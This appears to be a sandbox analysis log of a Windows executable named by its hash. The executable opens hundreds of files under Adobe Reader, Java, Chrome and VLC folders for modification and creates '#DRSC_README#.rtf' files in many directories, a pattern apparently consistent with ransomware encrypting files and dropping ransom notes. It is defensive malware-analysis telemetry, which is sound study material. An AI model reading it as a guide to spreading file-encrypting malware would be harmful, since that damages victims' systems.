710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\css\main-selector.css 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\ru-ru\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\ZX______.PFB 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\root\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jre1.8.0_66\lib\jfr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\uk-ua\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\da-dk\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\jvm.hprof.txt 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\add_reviewer.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\it-it\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\core_icons.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\en-il\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-swing-tabcontrol_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\images\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\cs-cz\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\epl-v10.html 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\back-arrow-down.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\example_icons2x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\tr-tr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\nb-no\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Checkers.api 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\images\themes\dark\example_icons2x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\sv_get.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\SetupMetrics\20200722123942.pma 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\ind_prog.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\epl-v10.html 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\doclib.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-jvmstat_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\hi_contrast\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\fi-fi\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\ta.pak 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\cs-cz\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\bin\sysinfo.bat 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\desktop.ini 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-api-annotations-common.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\include\jawt.h 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.addons.swt.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench3.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_history_18.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\[email protected] 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\pt-br\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\pl-pl\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\META-INF\eclipse.inf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\bin\server\Xusage.txt 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\triggerEvaluators.exsd 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-uihandler_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_filterselected-down_32.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\large_trefoil.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\sl-si\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\add-comment.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\IDTemplates\ENU\AdobeID.pdf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\sv-se\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\no_get.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\lua\http\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_sortedby_up_selected_18.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\tr-tr\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\email\empty.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\en-gb\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_default_winxp_blu.css 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\ja-jp\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\images\example_icons2x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\nb-no\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\fr-fr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\sk-sk\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\deploy.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\bin\klist.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\images\themes\dark\rhp_world_icon_hover_2x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\images\themes\dark\digsig_icons_2x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.sat4j.core_2.3.5.v201308161310.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-api-search.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\core\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\ro-ro\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\compare.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\it-it\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\da-dk\PlayStore_icon.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\es-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themeless\compare_poster.jpg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\es-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\PFM\zx______.pfm 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\skins\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\acrobat_parcel_generic_32.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\SearchEmail.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\download.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\themes\dark\arrow-up-pressed.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\pdf-ownership-no-text.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\ja-jp\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.apache.batik.util_1.7.0.v201011041433.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\images\share_icons2x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\hi.pak 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\psfontj2d.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\themes\dark\[email protected] 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\tr-tr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\sl.pak 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\sk-sk\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\meta-index 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\illustrations_retina.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\configuration\org.eclipse.equinox.simpleconfigurator\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\selector.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\fr-ma\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\eu-es\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\fr-fr\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\fi-fi\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\css\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache\binary\org.eclipse.rcp_root_4.4.0.v20141007-2301 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.renderers.swt.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\af_get.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\en-il\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\ant-javafx.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\fr-fr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\nb-no\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\ja-jp\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.swt.theme.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\ru-ru\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\sl-si\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\com.jrockit.mc.feature.console_5.5.0.165303\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\images\themeless\web_documentcloud_logo.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\ko-kr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\da-dk\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\nl-nl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.apache.lucene.analysis_3.5.0.v20120725-1805.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\progress_spinner_dark2x.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\cstm_brand_preview2x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\en-gb\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-openide-actions.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\bin\dblook 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\images\warning.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\ro-ro\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\images\themes\dark\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\bin\jdeps.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\en-il\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\eu-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\sv-se\PlayStore_icon.svg 